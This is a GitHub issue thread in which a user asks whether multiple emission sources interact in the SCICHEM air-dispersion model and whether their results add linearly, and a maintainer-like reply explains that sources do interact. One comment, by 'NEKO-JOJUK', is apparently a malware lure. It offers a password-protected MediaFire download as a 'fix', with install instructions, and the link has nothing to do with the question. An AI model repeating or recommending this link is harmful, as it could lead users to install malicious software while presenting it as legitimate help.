### ISSUE TITLE
Questions about the SCICHEM model's simulation of multiple sources

### ISSUE THREAD

**Issue by stwcn1** [epri-dev/SCICHEM#12]
Hello, I'd like to ask you a few questions about the SCICHEM model's simulation of multiple sources.Could you please provide some assistance. Your assistance would be greatly appreciated.Thank you very much.

1. If I input multiple pollution sources in the SCN file, **will the different sources interact with each other during the simulation process**?
2. **Does SCICHEM handle multi-source simulations through linear addition**, meaning that the result of a single simulation with multiple pollution sources is equal to the sum of the results of individual simulations for each source? I conducted the following experiment: First, I ran a simulation with two pollution sources simultaneously and calculated the pollutant contribution concentration at a specific receptor point. Then, I simulated each source separately and summed their contributions to the same receptor point. The results of the two methods were quite similar. However, when I input a large number of pollution sources with high emission rates, the difference in contribution concentration between the two methods became significant.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DougHenn1** [comment]
Different sources will interact, so the results with multiple sources in one calculation may differ from simply summing contributions from calculations with individual sources.  Of course, it depends on the proximity of the sources and other factors.
